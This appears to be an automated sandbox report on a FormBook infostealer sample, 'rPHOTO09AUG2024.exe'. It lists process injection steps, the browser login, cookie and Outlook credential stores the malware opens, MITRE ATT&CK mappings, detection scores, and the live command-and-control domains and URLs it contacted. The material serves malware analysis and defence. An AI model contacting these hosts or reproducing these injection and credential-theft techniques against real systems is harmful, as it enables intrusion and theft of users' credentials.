Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 4152

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D1F008

Jump to behavior

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D98C93 LogonUserW,

0_2_00D98C93

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D43B4C

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00D44A35

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DA4EC9 mouse_event,

0_2_00DA4EC9

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPHOTO09AUG2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

0_2_00D981F7

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DA4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00DA4C03

Source: rPHOTO09AUG2024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: eODCXMCnMwxOuMbj.exe, 00000003.00000002.4640685465.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000000.2237682775.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641133513.0000000000D71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: rPHOTO09AUG2024.exe, eODCXMCnMwxOuMbj.exe, 00000003.00000002.4640685465.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000000.2237682775.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641133513.0000000000D71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: eODCXMCnMwxOuMbj.exe, 00000003.00000002.4640685465.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000000.2237682775.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641133513.0000000000D71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: eODCXMCnMwxOuMbj.exe, 00000003.00000002.4640685465.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000003.00000000.2237682775.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641133513.0000000000D71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D6886B cpuid

0_2_00D6886B

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D750D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D750D7

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D82230 GetUserNameW,

0_2_00D82230

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D7418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00D7418A

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D44AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D44AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: rPHOTO09AUG2024.exe	Binary or memory string: WIN_81
Source: rPHOTO09AUG2024.exe	Binary or memory string: WIN_XP
Source: rPHOTO09AUG2024.exe	Binary or memory string: WIN_XPe
Source: rPHOTO09AUG2024.exe	Binary or memory string: WIN_VISTA
Source: rPHOTO09AUG2024.exe	Binary or memory string: WIN_7
Source: rPHOTO09AUG2024.exe	Binary or memory string: WIN_8
Source: rPHOTO09AUG2024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DB6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00DB6596
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DB6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00DB6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rPHOTO09AUG2024.exe	58%	ReversingLabs	Win32.Trojan.Strab
rPHOTO09AUG2024.exe	28%	Virustotal		Browse
rPHOTO09AUG2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
elettrosistemista.zip	11%	Virustotal	Browse
www.donnavariedades.com	8%	Virustotal	Browse
empowermedeco.com	12%	Virustotal	Browse
77980.bodis.com	0%	Virustotal	Browse
www.goldenjade-travel.com	8%	Virustotal	Browse
natroredirect.natrocdn.com	0%	Virustotal	Browse
www.kasegitai.tokyo	7%	Virustotal	Browse
www.techchains.info	11%	Virustotal	Browse
www.joyesi.xyz	4%	Virustotal	Browse
www.empowermedeco.com	5%	Virustotal	Browse
www.rssnewscast.com	6%	Virustotal	Browse
www.magmadokum.com	9%	Virustotal	Browse
www.3xfootball.com	10%	Virustotal	Browse
www.660danm.top	9%	Virustotal	Browse
www.liangyuen528.com	6%	Virustotal	Browse
www.antonio-vivaldi.mobi	9%	Virustotal	Browse
www.elettrosistemista.zip	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.donnavariedades.com/fo8o/?wP=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&fPh4U=MJo4	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/?wP=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&fPh4U=MJo4	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://www.joyesi.xyz/fo8o/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.empowermedeco.com/fo8o/	8%	Virustotal		Browse
http://www.joyesi.xyz/fo8o/	1%	Virustotal		Browse
http://www.empowermedeco.com/fo8o/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.empowermedeco.com/fo8o/?wP=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&fPh4U=MJo4	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png	0%	Avira URL Cloud	safe
https://www.value-domain.com/	0%	Avira URL Cloud	safe
http://www.liangyuen528.com/fo8o/	100%	Avira URL Cloud	malware
http://www.liangyuen528.com/fo8o/?wP=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=&fPh4U=MJo4	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/?wP=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&fPh4U=MJo4	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	100%	Avira URL Cloud	malware
http://www.liangyuen528.com/fo8o/	6%	Virustotal		Browse
https://www.value-domain.com/	0%	Virustotal		Browse
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png	0%	Virustotal		Browse
http://www.kasegitai.tokyo/fo8o/?wP=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&fPh4U=MJo4	100%	Avira URL Cloud	malware
http://www.donnavariedades.com/fo8o/	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	8%	Virustotal		Browse
https://code.jquery.com/jquery-3.7.1.min.js	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/	9%	Virustotal		Browse
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	0%	Avira URL Cloud	safe
http://www.donnavariedades.com/fo8o/	6%	Virustotal		Browse
https://www.sedo.com/services/parking.php3	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?wP=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&fPh4U=MJo4	100%	Avira URL Cloud	malware
https://code.jquery.com/jquery-3.7.1.min.js	1%	Virustotal		Browse
http://www.rssnewscast.com/fo8o/	0%	Avira URL Cloud	safe
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://codepen.io/uzcho_/pens/popular/?grid_type=list	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?wP=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&fPh4U=MJo4	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/	100%	Avira URL Cloud	malware
https://codepen.io/uzcho_/pen/eYdmdXw.css	0%	Avira URL Cloud	safe
https://www.sedo.com/services/parking.php3	0%	Virustotal		Browse
https://www.empowermedeco.com/fo8o/?wP=mxnR	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/	12%	Virustotal		Browse
https://rakkoma.com/	0%	Avira URL Cloud	safe
https://www.value-domain.com/modall.php	0%	Avira URL Cloud	safe
http://www.joyesi.xyz	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pen/eYdmdXw.css	0%	Virustotal		Browse
https://codepen.io/uzcho_/pens/popular/?grid_type=list	0%	Virustotal		Browse
http://www.goldenjade-travel.com/fo8o/	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	phishing
http://www.rssnewscast.com/fo8o/	5%	Virustotal		Browse
http://www.goldenjade-travel.com/fo8o/	9%	Virustotal		Browse
http://www.joyesi.xyz	4%	Virustotal		Browse
https://rakkoma.com/	0%	Virustotal		Browse
https://www.value-domain.com/modall.php	0%	Virustotal		Browse
http://www.techchains.info/fo8o/	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
elettrosistemista.zip	195.110.124.133	true	false	11%, Virustotal, Browse	unknown
www.donnavariedades.com	15.197.240.20	true	false	8%, Virustotal, Browse	unknown
empowermedeco.com	217.196.55.202	true	false	12%, Virustotal, Browse	unknown
77980.bodis.com	199.59.243.226	true	false	0%, Virustotal, Browse	unknown
www.3xfootball.com	154.215.72.110	true	false	10%, Virustotal, Browse	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	8%, Virustotal, Browse	unknown
www.rssnewscast.com	91.195.240.94	true	false	6%, Virustotal, Browse	unknown
www.techchains.info	66.29.149.46	true	false	11%, Virustotal, Browse	unknown
www.liangyuen528.com	15.197.172.60	true	false	6%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
www.kasegitai.tokyo	52.25.92.0	true	false	7%, Virustotal, Browse	unknown
www.magmadokum.com	unknown	unknown	true	9%, Virustotal, Browse	unknown
www.660danm.top	unknown	unknown	true	9%, Virustotal, Browse	unknown
www.joyesi.xyz	unknown	unknown	true	4%, Virustotal, Browse	unknown
www.empowermedeco.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.elettrosistemista.zip	unknown	unknown	true	7%, Virustotal, Browse	unknown
www.antonio-vivaldi.mobi	unknown	unknown	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.donnavariedades.com/fo8o/?wP=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&fPh4U=MJo4	false	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/?wP=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&fPh4U=MJo4	false	Avira URL Cloud: safe	unknown
http://www.empowermedeco.com/fo8o/	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.joyesi.xyz/fo8o/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.empowermedeco.com/fo8o/?wP=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&fPh4U=MJo4	false	Avira URL Cloud: safe	unknown
http://www.liangyuen528.com/fo8o/	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?wP=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&fPh4U=MJo4	false	Avira URL Cloud: safe	unknown
http://www.liangyuen528.com/fo8o/?wP=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=&fPh4U=MJo4	false	Avira URL Cloud: malware	unknown
http://www.elettrosistemista.zip/fo8o/	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.kasegitai.tokyo/fo8o/?wP=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&fPh4U=MJo4	false	Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?wP=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&fPh4U=MJo4	true	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?wP=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&fPh4U=MJo4	false	Avira URL Cloud: safe	unknown
http://www.kasegitai.tokyo/fo8o/	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.techchains.info/fo8o/	false	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
